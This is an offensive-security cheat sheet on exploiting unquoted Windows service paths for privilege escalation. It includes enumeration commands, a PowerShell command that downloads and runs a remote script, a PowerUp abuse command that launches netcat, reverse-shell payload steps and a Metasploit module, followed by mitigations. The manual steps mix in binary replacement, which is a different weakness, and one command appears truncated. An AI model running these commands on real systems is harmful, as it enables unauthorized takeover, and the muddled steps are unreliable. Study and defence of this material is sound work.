# EoP - Unquoted Service Paths ## Unquoted Service Path Vulnerabilities: Identification and Exploitation ### Key Concepts * **Service Path**: The location of the executable file that a service runs. * **Unquoted Path**: A service path containing spaces but lacking quotation marks (e.g., `C:\Program Files\My Service\service.exe` instead of `"C:\Program Files\My Service\service.exe"`). * **Privilege Escalation**: Gaining elevated access to protected resources. *** ### Identifying Unquoted Service Paths #### **1. Using WMIC** The **Windows Management Instrumentation Command-line (WMIC)** can enumerate services with unquoted paths: ```cmd cmdCopy codewmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\" ``` #### **2. Using PowerShell** A PowerShell script provides a more automated method to identify unquoted paths: ```powershell powershellCopy codeGet-WmiObject -Class Win32_Service | Where-Object { $_.StartName -eq "LocalSystem" } | Select-Object Name, DisplayName, PathName, StartMode | Where-Object { $_.PathName -match " " } ``` #### **3. Using PowerUp** PowerUp, a PowerShell script, identifies privilege escalation vectors, including unquoted paths: ```powershell powershellCopy codepowershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://xyz/PowerUp.ps1'); Invoke-AllChecks" ``` **Example Output:** ```plaintext plaintextCopy code[*] Checking for unquoted service paths... ServiceName : BBSvc Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe StartName : LocalSystem AbuseFunction: Write-ServiceBinary -ServiceName 'BBSvc' -Path ``` *** ### Exploiting Unquoted Service Paths #### **Manual Exploitation Steps** 1. **Identify the Vulnerable Service**:\ Use the methods above to detect vulnerable services. 2. **Create a Malicious Executable**:\ Generate a payload (e.g., a reverse shell) and place it in the same directory as the legitimate executable. 3. **Stop the Service**: ```cmd cmdCopy codesc stop [SERVICE_NAME] ``` 4. **Replace the Executable**:\ Replace the legitimate executable with the malicious payload. 5. **Restart the Service**: ```cmd cmdCopy codesc start [SERVICE_NAME] ``` 6. **Gain Access**:\ When the service restarts, it will execute the malicious payload with elevated privileges. *** #### **Example of Automatic Exploitation with PowerUp** Use PowerUp’s `Invoke-ServiceAbuse` to automate exploitation: ```powershell powershellCopy codeInvoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 1" ``` Replace `[SERVICE_NAME]` with the vulnerable service name and specify the payload command. *** #### **Example of Exploitation Behavior** For a service with the path: ```plaintext plaintextCopy codeC:\Program Files\Something\legit.exe ``` Windows will attempt to execute: 1. `C:\Program.exe` 2. `C:\Program Files.exe` 3. `C:\Program Files\Something\legit.exe` If a malicious `Program.exe` or `Program Files.exe` is placed in these locations, it will execute with elevated privileges. *** ### Exploiting with Metasploit Metasploit provides an exploit module for unquoted service paths: ```bash bashCopy codeuse exploit/windows/local/trusted_service_path ``` This automates the process of finding and exploiting unquoted paths. *** ### Mitigation Strategies #### **1. Quote Service Paths** Always enclose service paths in quotes, particularly if they contain spaces: ```plaintext plaintextCopy code"C:\Program Files\My Service\service.exe" ``` #### **2. Regular Audits** Periodically audit service configurations to detect and remediate unquoted paths. #### **3. Use Least Privilege** Run services with the least privilege required, avoiding `LocalSystem` unless absolutely necessary. #### **4. Implement Security Policies** Adopt strict policies to manage service configurations. #### **5. Monitoring and Alerts** Set up monitoring to detect unauthorized changes to service paths or configurations. *** ### Additional Resources * [**Microsoft Documentation on Windows Services**](https://learn.microsoft.com/en-us/windows/win32/services/overview-of-windows-service-applications) * **OWASP Top 10 Security Risks**